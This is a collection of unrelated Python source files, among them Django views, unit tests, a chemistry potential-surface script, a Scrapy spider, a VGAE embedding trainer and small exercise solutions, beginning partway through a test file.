u'corehq.pillows.sofabed.CaseDataPillow'}
self.assertEqual(expected_pillows, apply_pillow_actions_to_pillows(
[{'exclude_groups': ['phonelog']}], self.pillowtops))
def test_loading_existing_conf_file(self):
expected_action = {'include_groups': ['mvp']}
action = get_single_pillow_action('staging')
self.assertEqual(action.to_json(), expected_action)
def test_loading_no_existing_conf_file(self):
action = get_single_pillow_action('foo')
self.assertIsNone(action)
def test_india_server_exclusions(self):
self.pillowtops['fluff'] = [
'custom.bihar.models.CareBiharFluffPillow',
'custom.opm.models.OpmCaseFluffPillow',
'custom.opm.models.OpmUserFluffPillow',
]
pillows = get_pillows_for_env('india', self.pillowtops)
self.assertNotIn('custom.opm.models.OpmCaseFluffPillow', pillows)
self.assertNotIn('custom.opm.models.OpmUserFluffPillow', pillows)
self.assertIn('custom.bihar.models.CareBiharFluffPillow', pillows)
|
# coding=utf-8
import re
import os
import platform
import subprocess
import signal
import time
class Util(object):
def __init__(self, sn):
self.sn = sn
self.debug = False
if sn is None:
self.sn = self.__get_sn()
def __get_sn(self):
out = self.cmd('adb devices').strip()
out = re.split(r'[\r\n]+', out)
for line in out[1:]:
if not line.strip():
continue
if 'offline' in line:
print(line)
continue
sn, _ = re.split(r'\s+', line, maxsplit=1)
return sn
raise NameError('没有手机连接 (No device connected)')
def cmd(self, arg, timeout=30, is_async=False):
"""
执行命令,并返回命令的输出,有超时可以设置
:param arg:
:param timeout:
:return:
"""
is_linux = platform.system() == 'Linux'
start = time.time()
out = [] # 保存产生的输出内容
if self.debug:
print(arg)
p = subprocess.Popen(arg, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True,
preexec_fn=os.setsid if is_linux else None)
if is_async: # 异步执行,直接返回
return p
while True:
out_line = p.stdout.readline().decode('utf-8').strip() # 单行输出内容
out.append(out_line) # 输出保存到列表
if p.poll() is not None:
break
seconds_passed = time.time() - start
if timeout and seconds_passed > timeout:
if is_linux:
os.killpg(p.pid, signal.SIGTERM)
else:
p.terminate()
raise TimeoutError(arg, timeout)
out = list(filter(None, out)) # 将空内容过滤
out = '\n'.join(out) # 将内容连接为字符串
# print('time:{}, cmd:{}'.format(time.time() - start, arg))
return out
def adb(self, arg, timeout=30, is_async=False):
arg = 'adb -s {} {}'.format(self.sn, arg)
return self.cmd(arg, timeout, is_async)
def shell(self, arg, timeout=30, is_async=False):
arg = 'shell {}'.format(arg)
return self.adb(arg, timeout, is_async)
def cmd_out_save(self, arg, pc_path, mode='a'):
"""
将命令的输出保存到文件
:param arg: 命令
:param pc_path: 保存路径
:param mode: 保存模式,默认是追加
:return:
"""
with open(pc_path, mode) as f:
subprocess.call(arg, stdout=f)
|
"""
Utilities for the :mod:`dicom_parser.utils.siemens.csa` module.
"""
# DICOM VR code to Python type
VR_TO_TYPE = {
"FL": float, # float
"FD": float, # double
"DS": float, # decimal string
"SS": int, # signed short
"US": int, # unsigned short
"SL": int, # signed long
"UL": int, # unsigned long
"IS": int, # integer string
}
ENCODING: str = "latin-1"
NULL: bytes = b"\x00"
def strip_to_null(string):
"""
Strip string to first null.
Parameters
----------
s : bytes
Returns
-------
sdash : str
s stripped to first occurrence of null (0)
"""
zero_position = string.find(NULL)
if zero_position == -1:
return string
return string[:zero_position].decode(ENCODING)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2021 Johannes Reiff
# SPDX-License-Identifier: MIT
"""
Implementation of the LiCN ⇌ LiNC isomerization potential surface.
This code is based on:
* R. Essers, J. Tennyson, and P. E. S. Wormer,
“An SCF potential energy surface for lithium cyanide,”
Chem. Phys. Lett. 89, 223–227 (1982),
doi:10.1016/0009-2614(82)80046-8.
* J. Tennyson,
“LiCN/LiNC potential surface procedure,”
Private communication.
Significant parameter deviations between these sources are marked with “!!!”.
"""
import operator
import sys
import matplotlib.pyplot as plt
import numpy as np
import scipy.optimize
import scipy.special
# Multipole moments <Q_L,0> for the electrostatic energy.
MOMENT_Q = [-1.00, -0.215135, -3.414573, -3.818815, -15.84152, -14.29374, -43.81719]
# Induction energy coefficients C_l1,l2,L.
# Format: (l1, l2): {L: C_l1,l2,L}
# Some parameters include a factor 2 to account for C_l1,l2,L = C_l2,l1,L.
INDUCION_COEFFS = {
(1, 1): {0: -10.5271, 2: -3.17},
(2, 1): {1: -20.62328, 3: 3.7320800}, # !!! 4.06 vs 3.7320800
(2, 2): {0: -57.49396, 2: -106.8192, 4: 17.14139}, # includes (3, 1)
(3, 2): {1: -202.8972, 3: -75.23207, 5: -28.45514},
(3, 3): {0: -458.2015, 2: -353.7347, 4: -112.6427, 6: -108.2786},
}
# Damping fit parameters.
DAMPING_R0 = 1.900781
DAMPING_A = 1.515625
# Short-range fit parameters A_L, B_L, and C_L.
SHORT_RNG_PARAMS = [
# A_L B_L C_L
(-1.3832116, +0.14000706, +0.2078921600),
(-2.9579132, +1.47977160, -0.0116130820),
(-4.7420297, +1.81198620, -0.0171806800), # !!! 0.017818 vs 0.0171806800
(-1.8885299, +1.28750300, +0.0277284910),
(-4.4143354, +2.32297140, -0.0706927420),
(-4.0256496, +2.77538320, -0.1377197800),
(-5.8425899, +3.48085290, -0.1863111400),
(-2.6168114, +2.65559520, -0.0058815504),
(-6.3446579, +4.34498010, -0.1529136800),
(15.2022800, -6.54925370, +1.3025678000),
]
def main():
minmax_saddle = find_saddle_minmax()
gradroot_saddle = find_saddle_gradroot()
min_0, min_pi = find_minima()
print('MEP maximum:', minmax_saddle, '->', potential(*minmax_saddle))
print('grad V = 0:', gradroot_saddle, '->', potential(*gradroot_saddle))
print('min V(ϑ = 0):', min_0, '->', potential(*min_0))
print('min V(ϑ = π):', min_pi, '->', potential(*min_pi))
plot_potential(minmax_saddle, min_0, min_pi)
def find_saddle_minmax():
"""Calculate saddle position via a maximum along the minimum energy path."""
tol = 1e-8
mep = lambda theta: minimize(potential, 4.5, [float(theta)], tol=tol)
res = minimize(lambda theta: -mep(theta).fun, 0.8, tol=tol)
return mep(res.x[0]).x[0], res.x[0]
def find_saddle_gradroot():
"""Calculate saddle position via a root of the potential's gradient."""
eps = np.sqrt(np.finfo(float).eps)
pot = lambda pos: potential(*pos)
dpot = lambda pos: scipy.optimize.approx_fprime(pos, pot, eps)
res = scipy.optimize.root(dpot, (4.5, 0.8))
assert res.success
return tuple(res.x)
def find_minima():
"""Calculate minima corresponding to the LiCN and LiNC configurations."""
tol = 1e-8
pot = lambda pos: potential(*pos)
for theta in (0, np.pi):
yield tuple(minimize(pot, (4.5, theta), tol=tol).x)
def plot_potential(*points):
"""Show a 2D plot of the potential with markers."""
r = np.linspace(3.0, 5.5, 256)
theta = np.linspace(0.0, np.pi, 256)
mesh_r, mesh_theta = np.meshgrid(r, theta)
pot = potential(mesh_r, mesh_theta)
fig, ax = plt.subplots(constrained_layout=True)
ax.imshow(pot, extent=(r[0], r[-1], theta[0], theta[-1]), vmax=-0.12,
origin='lower', aspect='auto', interpolation='spline16')
levels = np.linspace(pot.min(), -0.20, 12)
ax.contour(mesh_r, mesh_theta, pot, levels, colors='w')
for point in points:
ax.plot(*point, marker='x', ms=10, color='tab:orange')
plt.show()
plt.close(fig)
def potential(r, theta):
"""Full potential V(R, ϑ)."""
legendre = [legendre_cos(l, theta) for l in range(len(SHORT_RNG_PARAMS))]
return (
(pot_electrostat(r, legendre) + pot_induction(r, legendre)) * damping(r)
+ pot_short_rng(r, legendre)
)
def pot_electrostat(r, legendre):
"""Electrostatic energy E_el(R, ϑ)."""
return sum(
r**(-l - 1) * q * legendre[l]
for l, q in enumerate(MOMENT_Q)
)
def pot_induction(r, legendre):
"""Induction energy E_ind(R, ϑ)."""
return sum(
r**(-2 - l1 - l2) * sum(c * legendre[l] for l, c in cl.items())
for (l1, l2), cl in INDUCION_COEFFS.items()
)
def pot_short_rng(r, legendre):
"""Short-range energy E_SR(R, ϑ)."""
return sum(map(operator.mul, short_rng_params(r), legendre))
def short_rng_params(r):
"""Short-range parameter D_L(R)."""
return (np.exp(-a - b * r - c * r**2) for a, b, c in SHORT_RNG_PARAMS)
def damping(r):
"""Damping function F(R)."""
return 1 - np.exp(-DAMPING_A * (r - DAMPING_R0)**2)
def legendre_cos(l, theta):
return scipy.special.eval_legendre(l, np.cos(theta))
def minimize(*args, **kwargs):
res = scipy.optimize.minimize(*args, **kwargs)
assert res.success
return res
if __name__ == '__main__':
sys.exit(int(main() or 0))
|
from django.shortcuts import render, redirect
from django.http import HttpResponse
import csv
from django.contrib import messages
import time
import os
# forms
from analysis.forms import homeForm
from analysis.forms import selectForm
# backend file
from analysis.result_analysis import analysis_fun
# Create your views here.
# creates a result.csv file
def handle_uploaded_file(f, fname):
try:
with open('analysis/static/media/'+fname+'.csv', 'wb+') as writeFile:
#writer = csv.writer( writeFile , delimiter=',' )
for chunk in f.chunks():
writeFile.write(chunk)
print('File Created')
except Exception as e:
pass
# Home
def home(request):
if request.method == "POST":
form = homeForm(request.POST, request.FILES)
if form.is_valid():
request.session['fileName'] = str(time.time())
print(request.session['fileName'])
handle_uploaded_file(request.FILES['file'], request.session['fileName'])
#return HttpResponse("hi")
return redirect('/analysis/select')
else:
messages.error(request, 'Failed to validate')
else:
return render(request, "home.html", {"homeForm":homeForm})
# Select
def getSubjectCode(fname):
print(fname)
try:
with open('analysis/static/media/'+fname+'.csv', 'r') as csvfile:
results = csv.reader(csvfile, delimiter=',')
subjectCode = next(results, None)
retSubCode = []
for s in subjectCode:
retSubCode.append((s, s))
return tuple(retSubCode)
except Exception as e:
print('File not found')
return ''
def select(request):
if request.method == "POST":
form = selectForm(request.POST)
#form = selectForm()
form.fields['subjectCode'].choices = getSubjectCode(request.session['fileName'])
if form.is_valid():
picked = form.cleaned_data.get('subjectCode')
#print(picked)
analysis_fun(request.session['fileName'], picked)
messages.success(request, 'File Analysis Successful')
else:
messages.error(request, 'Failed to validate')
return redirect('/analysis/home')
return redirect('/analysis/result')
else:
print(getSubjectCode(request.session['fileName']))
form = selectForm()
form.fields['subjectCode'].choices = getSubjectCode(request.session['fileName'])
try:
fileContent = []
with open('analysis/static/media/'+request.session['fileName']+'.csv', 'r') as readFile:
reader = csv.reader(readFile)
for row in reader:
fileContent.append(row)
except Exception as e:
pass
return render(request, "select.html", {"selectForm":form, "fileContent":fileContent})
# Result
def result(request):
if request.method == "POST":
try:
with open('analysis/static/media/analysis'+request.session['fileName']+'.csv', 'rb') as fh:
response = HttpResponse(fh.read(), content_type="text/csv")
response['Content-Disposition'] = 'inline; filename=' + 'analysis.csv'
os.remove('analysis/static/media/'+request.session['fileName']+'.csv')
os.remove('analysis/static/media/analysis'+request.session['fileName']+'.csv')
return response
#return redirect('/analysis/home')
except Exception as e:
messages.error(request, 'Failed to Download')
return redirect('/analysis/home')
else:
try:
fileContent = []
with open('analysis/static/media/analysis'+request.session['fileName']+'.csv', 'r') as readFile:
reader = csv.reader(readFile)
for row in reader:
fileContent.append(row)
except Exception as e:
pass
return render(request, "result.html", {"fileContent":fileContent})
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django_mysql.models import JSONField, Model
from django.db import models
from cuestionarios.models import Preguntas_test, Grupo_edad
from alumnos.models import Alumno
class Respuesta(Model):
alumno = models.ForeignKey(Alumno,
on_delete=models.CASCADE, null=True, blank=True)
pregunta = models.ForeignKey(Preguntas_test,
on_delete=models.CASCADE)
respuesta = JSONField()
class Link(Model):
name = models.TextField(max_length=500, blank=False)
url = models.TextField(max_length=500, blank=False)
|
# -*- encoding: utf-8 -*-
"""Testing Unittest facilities offered.
This doesn't test 'wrap' command, but the 'self.w' provided to
tests inheriting BaseShTest.
"""
from .. import ShellError, BaseShTest
class WrapSimpleTest(BaseShTest):
def test_shell_call(self):
out = self.w("true")
self.assertEquals(out, "")
def test_full_bash_construct(self):
out = self.w("(false || true) && test -z "" > /dev/null")
self.assertEquals(out, "")
def test_fail(self):
self.assertRaises(ShellError, self.w, ("false", ))
class WrapEnvTest(BaseShTest):
DEFAULT_ENV = {"MYVALUE": "XYXY"}
def test_shell_env(self):
out = self.w("echo $MYVALUE")
self.assertEquals(out, "XYXY")
def test_shell_inherit_main_process_env(self):
import os
os.environ["MYVALUE2"] = "ABAB"
out = self.w("echo $MYVALUE2")
self.assertEquals(out, "ABAB")
|
from contextlib import closing
from mysql.connector import connect
import random
def create_journal_group_name_lookup(filepath, encoding, delimiter):
data = load_delimited_data(filepath, encoding, delimiter)
lookup = {}
for row in data:
nlm_id = row[0]
group = row[1]
lookup[nlm_id] = group
return lookup
def create_id_lookup(db_config, sql):
lookup = {}
with closing(connect(**db_config)) as conn:
with closing(conn.cursor()) as cursor: #pylint: disable=E1101
cursor.execute(sql) #pylint: disable=E1101
for row in cursor.fetchall(): #pylint: disable=E1101
id, ui = row
lookup[ui] = id
return lookup
def load_delimited_data(path, encoding, delimiter):
with open(path, 'rt', encoding=encoding) as file:
data = tuple( tuple(data_item.strip() for data_item in line.strip().split(delimiter)) for line in file )
return data
def load_ids_from_file(path, encoding):
ids = [int(id[0]) for id in load_delimited_data(path, encoding, ',')]
return ids
def load_indexing_periods(filepath, encoding, is_fully_indexed):
periods = {}
with open(filepath, 'rt', encoding=encoding) as file:
for line in file:
split = line.split(',')
nlm_id = split[0].strip()
citation_subset = split[1].strip()
start_year = int(split[2].strip())
end_year = int(split[3].strip())
if start_year < 0:
continue
if end_year < 0:
end_year = None
period = { 'citation_subset': citation_subset, 'is_fully_indexed': is_fully_indexed, 'start_year': start_year, 'end_year': end_year }
if nlm_id in periods:
periods[nlm_id].append(period)
else:
periods[nlm_id] = [period]
return periods
def random_permutation(iterable, r=None):
pool = tuple(iterable)
r = len(pool) if r is None else r
return tuple(random.sample(pool, r))
def save_delimited_data(path, encoding, delimiter, data):
with open(path, 'wt', encoding=encoding) as file:
for data_row in data:
line = delimiter.join([str(data_item) for data_item in data_row]) + '\n'
file.write(line)
def should_review_coverage_note(coverage_note_text):
coverage_note_text_lower = coverage_note_text.lower()
should_review = str('sel' in coverage_note_text_lower or 'ful' in coverage_note_text_lower)
return should_review
def write_ids_to_file(path, encoding, ids):
save_delimited_data(path, encoding, ',', [(id,) for id in ids])
|
def linha():
print('-=' * 30)
def area(a, b):
ar = a * b
print(f'A área de um terreno {a:.2f} x {b:.2f} é de {ar:.2f}m² ')
#Função Main
linha()
print(' Controle de Terrenos')
linha()
larg = float(input('Largura (m): '))
comp = float(input('Comprimento (m): '))
area(larg, comp)
|
import pytest
from my_package import process
@pytest.mark.parametrize(
'name, expected',
[
['Hemingway, Ernest', 'Ernest Hemingway'],
['virginia woolf', 'Virginia Woolf'],
['charles dickens ', 'Charles Dickens'],
],
)
def test_clean_name(name, expected):
assert process.clean_name(name) == expected
|
import scrapy
import os
import logging
logging.basicConfig()
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
try:
from lyrics_crawler_single.constants import (
BASE_URL,
TOP_N,
MOST_ACCESSED,
OUTPUT_FILE,
)
except:
from constants import BASE_URL, TOP_N, MOST_ACCESSED, OUTPUT_FILE
class TopNLyricsSpider(scrapy.Spider):
name = "top_n_lyrics"
start_urls = [
os.path.join(BASE_URL, MOST_ACCESSED, "axe"),
os.path.join(BASE_URL, MOST_ACCESSED, "fado"),
os.path.join(BASE_URL, MOST_ACCESSED, "infantil"),
os.path.join(BASE_URL, MOST_ACCESSED, "mpb"),
os.path.join(BASE_URL, MOST_ACCESSED, "pagode"),
os.path.join(BASE_URL, MOST_ACCESSED, "poprock"),
os.path.join(BASE_URL, MOST_ACCESSED, "samba"),
os.path.join(BASE_URL, MOST_ACCESSED, "bossa-nova"),
]
def parse(self, response):
for lyrics_list in response.css("ol.top-list_mus"):
for _i, lyric in enumerate(lyrics_list.css('li a::attr("href")')):
with open(OUTPUT_FILE, "a") as f:
uri = lyric.get()
if uri[0] == "/":
uri = uri[1:]
f.write(f"{os.path.join(BASE_URL,uri)}\n")
if _i >= TOP_N:
break
|
#!/usr/bin/python3
# knowing cipher-text and plain-text
# we can obtain key of vigenere-ciper
# then use https://www.dcode.fr/vigenere-cipher
plaintext = "OrestisHackingforfunandprofit"
ciphertext = "PieagnmJkoijegnbwzwxmlegrwsnn"
key = ""
for i in range(len(plaintext)):
num_key = ((ord(ciphertext[i]) - ord(plaintext[i])) % 26) + 97
char_key = chr(num_key)
key = key + char_key
print(key)
|
import pandas as pd
import dataconfig as cfg
import csv
from os import listdir
from os.path import isfile, join
def main():
root_folder=cfg.data['watch_event_out_folder']
filenames = [f for f in listdir(root_folder) if isfile(join(root_folder, f))]
filenames=[root_folder+f for f in filenames]
#Ref:https://stackoverflow.com/questions/2512386/how-to-merge-200-csv-files-in-python#
combined_csv = pd.concat([pd.read_csv(f) for f in filenames ])
combined_csv.to_csv(root_folder+"combined_csv.csv", index=False)
if __name__ == "__main__":
main()
pass
|
#!/usr/bin/env python3
# coding:utf-8
class Solution:
# 这里要特别注意~找到任意重复的一个值并赋值到duplication[0]
# 函数返回True/False
def duplicate(self, numbers, duplication):
table = set()
for num in numbers:
if num not in table:
table.add(num)
else:
duplication[0] = num
return True
return False
if __name__ == "__main__":
numbers = [2, 3, 1, 0, 2, 5, 3]
duplication = [0]
s = Solution()
ans = s.duplicate(numbers, duplication)
print(ans)
print(duplication[0])
|
import os
from setuptools import setup
f = open(os.path.join(os.path.dirname(__file__), 'README.md'))
readme = f.read()
f.close()
VERSION = "0.2.2"
setup(
name = "paizaio-api"
, version = VERSION
, author = "Takazumi Shirayanagi"
, author_email = "zumix.cpp@gmail.com"
, url = "https://github.com/srz-zumix/paizaio-api/"
, description = "A Python binding to the paiza.IO API."
, license = "MIT"
, platforms = ["any"]
, keywords = "API, paiza.IO, paizaio, paiza-io"
, packages = ['paizaio']
, long_description = readme
, classifiers = [
"Development Status :: 3 - Alpha"
, "Topic :: Utilities"
, "License :: OSI Approved :: MIT License"
]
, install_requires=['requests']
)
|
import os.path
import sys
sys.path = [os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', 'lib')] + sys.path
from amqpsfw import amqp_spec, ioloop
from amqpsfw.server.server import Server, ServerClient
from amqpsfw.client.client import Client
from amqpsfw.client.configuration import ClientConfiguration
from amqpsfw.server.configuration import ServerConfiguration
class TestServer:
def test_server_basic(self):
class ClientPublishAplication(Client):
def processor(self):
channel_number = 1
start = yield from super().processor()
ch_open1 = amqp_spec.Channel.Open(channel_number=1)
ch_open_ok = yield self.write(ch_open1)
flow = amqp_spec.Channel.Flow(channel_number=ch_open1.channel_number)
flow_ok = yield self.write(flow)
ex_declare = amqp_spec.Exchange.Declare('message', channel_number=ch_open1.channel_number)
declare_ok = yield self.write(ex_declare)
declare_q = amqp_spec.Queue.Declare(queue_name='text', channel_number=ch_open1.channel_number)
declare_q_ok = yield self.write(declare_q)
bind = amqp_spec.Queue.Bind(queue_name='text', exchange_name='message', routing_key='text.#', channel_number=ch_open1.channel_number)
bind_ok = yield self.write(bind)
yield self.sleep(3)
for t in range(100):
content = "qwe" + str(t)
response = yield self.write(amqp_spec.Basic.Publish(exchange_name='message', routing_key='text.tratata', channel_number=channel_number))
assert response is None
response = yield self.write(amqp_spec.Header(class_id=amqp_spec.Basic.Publish.class_id, body_size=len(content), header_properties={'content-type': 'application/json'}, channel_number=channel_number))
assert response is None
response = yield self.write(amqp_spec.Content(content=content, channel_number=channel_number))
assert response is None
response = yield self.write(amqp_spec.Channel.Close(channel_number=channel_number))
assert type(response) is amqp_spec.Channel.CloseOk
response = yield self.write(amqp_spec.Connection.Close())
assert type(response) is amqp_spec.Connection.CloseOk
yield self.stop()
io_loop = ioloop.IOLoop()
s_app = Server(io_loop)
c_app = ClientPublishAplication(io_loop)
c_app.config = ClientConfiguration()
s_app.config = ServerConfiguration()
c_app.config.port = 55555
s_app.config.port = 55555
s_app.start()
c_app.start()
io_loop.start()
|
# -*- coding: utf-8 -*-
import json
from flask_restful import Resource
from dashboard import r_kv
from ..utils import build_response
class KeyList(Resource):
"""
Get the keys in database.
Return all the keys exist in database which are used to
store data for build table and visualization. i.e, those
data shared by users in ipython.
Attributes:
"""
def get(self):
"""
Get key list in storage.
"""
keys = r_kv.keys()
keys.sort()
return build_response(dict(data=keys, code=200))
class Key(Resource):
"""
Get the data of a key.
Get all the data of a key. Both Key and KeyList API has much to
implement in future to make it more usable. Namely, auto-complete
for KeyList, and fetch part of data via a key for this API.
Attributes:
"""
def get(self, key):
"""
Get a key-value from storage according to the key name.
"""
data = r_kv.get(key)
# data = json.dumps(data) if isinstance(data, str) else data
# data = json.loads(data) if data else {}
return build_response(dict(data=data, code=200))
|
import urllib
import zipfile
import csv
from django import test
from localground.apps.site.tests import Client, ModelMixin
from rest_framework import status
from StringIO import StringIO
from django.contrib.gis.geos import Point
from localground.apps.site.api.tests.renderer_tests import mixins
from localground.apps.site.api.renderers.zip_renderer import ZIPRenderer
from localground.apps.site import models
class ZipMediaMixin(mixins.MediaMixin):
def test_zip_is_valid(self):
for url in self.urls:
response = self.client_user.get(
url + '?format=zip&project_id={0}'.format(self.project.id)
)
data = StringIO(response.content)
# Check if the zip file is not corrupted
zip_file = zipfile.ZipFile(data, 'r')
# Read all the files in the zip and check their
# CRCs and file headers.
# Return the name of the first file with an error,
# or else return None.
valid_if_none = zip_file.testzip()
self.assertIsNone(valid_if_none)
zip_file.close()
def _all_media_files_present_in_zip_file(self, is_list=False):
for url in self.urls.keys():
expected_count = self.urls.get(url)
response = self.client_user.get(
url + '?format=zip&project_id={0}'.format(self.project.id)
)
data = StringIO(response.content)
zip_file = zipfile.ZipFile(data, 'r')
data = StringIO(zip_file.read('content.csv'))
reader = csv.DictReader(data)
# Check that all photo paths are in the zip file:
file_paths = ['content.csv']
num_rows = 0
for row in reader:
key = row.get('overlay_type')
if 'dataset_' in key and not is_list:
key = 'record'
num_rows += 1
file_path_columns = ZIPRenderer.PATH_FIELD_LOOKUP.get(key) \
or []
for file_path_column in file_path_columns:
for column_header in row:
# "endswith" handles nested file paths, for example
# when record objects reference photo objects
if column_header.endswith(file_path_column):
if row.get(column_header) != '':
file_paths.append(row.get(column_header))
self.assertSetEqual(set(file_paths), set(zip_file.namelist()))
self.assertEqual(num_rows, expected_count)
if file_path_columns is ZIPRenderer.URL_PATH_FIELDS:
self.assertTrue(num_rows > 4)
else:
# make sure that it found at least 2 file paths
# print url
# print zip_file.namelist()
# print file_path_columns
self.assertTrue(
len(zip_file.namelist()) >= (1 + len(file_path_columns))
)
class ZIPRendererListTest(ZipMediaMixin, test.TestCase, ModelMixin):
'''
These tests test the ZIP renderer using the /api/0/photos/
(though any endpoint could be used).
'''
def setUp(self):
ModelMixin.setUp(self)
ZipMediaMixin.setUp(self)
# just test data types that have media files (skip map images for now
# because they're auto-processed:
self.urls = {
'/api/0/photos/': 2,
'/api/0/audio/': 2,
'/api/0/prints/': 2,
'/api/0/datasets/{}/data/'.format(self.record1.dataset.id): 8
}
def test_all_media_files_present_in_zip_file(self):
self._all_media_files_present_in_zip_file(is_list=True)
class ZIPRendererInstanceTest(ZipMediaMixin, test.TestCase, ModelMixin):
def setUp(self):
ModelMixin.setUp(self)
# ZipMediaMixin.setUp(self)
self.photo1 = self.create_photo_with_media(
name="f1", tags=self.tags1, point=self.point
)
self.photo2 = self.create_photo_with_media(
name="f2", tags=self.tags2, point=self.point
)
self.audio1 = self.create_audio_with_media(
name="f1", tags=self.tags1, point=self.point
)
self.audio2 = self.create_audio_with_media(
name="f2", tags=self.tags2, point=self.point
)
self.dataset = self.create_dataset_with_fields(
name="Class Dataset", num_fields=9
)
# self.dataset = models.Dataset.objects.get(id=self.dataset.id) # requery
self.record1 = self.insert_dataset_data_record(
dataset=self.dataset,
project=self.project,
geoJSON=mixins.point,
name='rec1'
)
self.urls = {
# 1 project + 2 photos + 2 audio + 1 record
'/api/0/projects/{0}/'.format(self.project.id): 1,
# 1 project + 2 photos + 2 audio (no records)
# '/api/0/datasets/{0}/data/{1}/'.format(
# self.dataset.id, self.record1.id): 5
'/api/0/datasets/{0}/data/{1}/'.format(
self.dataset.id, self.record1.id): 1
}
# def test_all_media_files_present_in_zip_file(self):
# self.create_relation(self.record1, self.photo1)
# self.create_relation(self.record1, self.photo2)
# self.create_relation(self.record1, self.audio1)
# self.create_relation(self.record1, self.audio2)
#
# file_path_columns = ZIPRenderer.URL_PATH_FIELDS
# self._all_media_files_present_in_zip_file(is_list=False)
|
from __future__ import division
from __future__ import print_function
import argparse
import time
import numpy as np
import scipy.sparse as sp
import torch
import pickle
from torch import optim
from load_graph_embedding import load_embedding
from graph_embedding_config import *
from vgae_model import GCNModelVAE
from vgae_utils import load_data, mask_test_edges, preprocess_graph, get_roc_score, loss_function
class VGAE(object):
def __init__(self, graph, embedding_path, configs):
self.graph = graph
self.embedding_path = embedding_path
self.seed = 42
self.epochs = 20
self.hidden1 = 512
self.hidden2 = 128
self.lr = 0.01
self.dropout = 0
self.adj, self.features = load_data(self.graph, configs)
self.n_nodes, self.feat_dim = self.features.shape
# Store original adjacency matrix (without diagonal entries) for later
self.adj_orig = self.adj
self.adj_orig = self.adj_orig - sp.dia_matrix((self.adj_orig.diagonal()[np.newaxis, :], [0]), shape=self.adj_orig.shape)
self.adj_orig.eliminate_zeros()
self.model = None
self.optimizer = None
def sample_graph(self):
r = mask_test_edges(self.adj)
f = open("{}VGAE_samples.pkl".format(self.embedding_path), 'wb')
pickle.dump(r, f)
f.close()
self.adj_train, self.train_edges, self.val_edges, self.val_edges_false, self.test_edges, self.test_edges_false = r
# g = open("./data/title and description/VGAE.pkl", 'rb')
# adj_train, train_edges, val_edges, val_edges_false, test_edges, test_edges_false = pickle.load(g)
# g.close()
self.adj = self.adj_train
# Some preprocessing
self.adj_norm = preprocess_graph(self.adj)
self.adj_label = self.adj_train + sp.eye(self.adj_train.shape[0])
# adj_label = sparse_to_tuple(adj_label)
self.adj_label = torch.FloatTensor(self.adj_label.toarray())
self.pos_weight = torch.Tensor([float(self.adj.shape[0] * self.adj.shape[0] - self.adj.sum()) / self.adj.sum()])
self.norm = self.adj.shape[0] * self.adj.shape[0] / float((self.adj.shape[0] * self.adj.shape[0] - self.adj.sum()) * 2)
def build_model(self):
self.model = GCNModelVAE(self.feat_dim, self.hidden1, self.hidden2, self.dropout)
self.optimizer = optim.Adam(self.model.parameters(), lr=self.lr)
def train(self, epochs):
self.sample_graph()
self.build_model()
self.hidden_emb = None
print("VGAE Start Training")
for epoch in range(epochs):
t = time.time()
self.model.train()
self.optimizer.zero_grad()
self.recovered, self.mu, self.logvar = self.model(self.features, self.adj_norm)
self.loss = loss_function(preds=self.recovered, labels=self.adj_label,
mu=self.mu, logvar=self.logvar, n_nodes=self.n_nodes,
norm=self.norm, pos_weight=self.pos_weight)
self.loss.backward()
self.optimizer.step()
self.cur_loss = self.loss.item()
self.hidden_emb = self.mu.data.numpy()
print(self.hidden_emb)
self.roc_curr, self.ap_curr = get_roc_score(self.hidden_emb, self.adj_orig, self.val_edges, self.val_edges_false)
print("Epoch:", '%04d' % (epoch + 1), "train_loss=", "{:.5f}".format(self.cur_loss),
"val_ap=", "{:.5f}".format(self.ap_curr),
"time=", "{:.5f}".format(time.time() - t)
)
f = open("{}/VGAE.nv".format(self.embedding_path), "w")
f.write(" ".join([str(x) for x in self.hidden_emb.shape]))
f.write("\n")
for i in range(self.hidden_emb.shape[0]):
d = " ".join([str(x) for x in self.hidden_emb[i]])
f.write("{} {}\n".format(str(i), d))
f.close()
print("VGAE Optimization Finished!\n")
def build_vgae(g, path, configs):
vgae = VGAE(g, path, configs)
vgae.train(epochs)
embedding = load_embedding("{}/VGAE.nv".format(path))
return embedding
|
from collections import defaultdict
from copy import deepcopy
import os
import re
dx = [-1, 0, 1]
dy = [-1, 0, 1]
dz = [-1, 0, 1]
dw = [-1, 0, 1]
def process(x, y, z, w, system):
current_value, neighbours = system[(x, y, z, w)], ""
for x2 in dx:
for y2 in dy:
for z2 in dz:
for w2 in dw:
if not (
x == x + x2 and y == y + y2 and z == z + z2 and w == w + w2
):
neighbours += system[(x + x2, y + y2, z + z2, w + w2)]
active = neighbours.count("#")
if (current_value == "#" and active in [2, 3]) or (
current_value == "." and active == 3
):
return "#"
return "."
def boot(system, is_part1):
for cycle in range(6):
expansion = cycle + 1
next_system = deepcopy(system)
w_range_start = 0 if is_part1 else -expansion
w_range_stop = 1 if is_part1 else expansion + 1
for w in range(w_range_start, w_range_stop):
for z in range(-expansion, 1 + expansion):
for y in range(-expansion, len(lines) + expansion):
for x in range(-expansion, len(lines[0]) + expansion):
next_system[(x, y, z, w)] = process(x, y, z, w, system)
system = deepcopy(next_system)
return sum([1 for cell in system.values() if cell == "#"])
with open(os.path.join(os.path.dirname(__file__), "input.txt"), "r") as file:
lines = [l.strip() for l in file.readlines()]
system = defaultdict(lambda: ".")
for y, row in enumerate(lines):
for x, cell in enumerate(row):
system[(x, y, 0, 0)] = cell
print(f"Part 1: {boot(system, True)}") # 319
print(f"Part 2: {boot(system, False)}") # 2324
|
from sandbox.rocky.tf.q_functions.base import QFunction
import sandbox.rocky.tf.core.layers as L
import tensorflow as tf
import numpy as np
from rllab.core.serializable import Serializable
from sandbox.rocky.tf.core.layers_powered import LayersPowered
from sandbox.rocky.tf.misc import tensor_utils
from sandbox.rocky.tf.policies.base import StochasticPolicy
class NAFMLPQFunction(QFunction, LayersPowered, Serializable):
def __init__(
self,
env_spec,
name='nafqnet',
hidden_sizes=(32, 32),
hidden_nonlinearity=tf.nn.relu,
action_merge_layer=0,
output_nonlinearity=None,
hidden_W_init=L.XavierUniformInitializer(),
hidden_b_init=L.ZerosInitializer(),
output_W_init=L.XavierUniformInitializer(),
output_b_init=L.ZerosInitializer(),
bn=False):
Serializable.quick_init(self, locals())
assert not env_spec.action_space.is_discrete
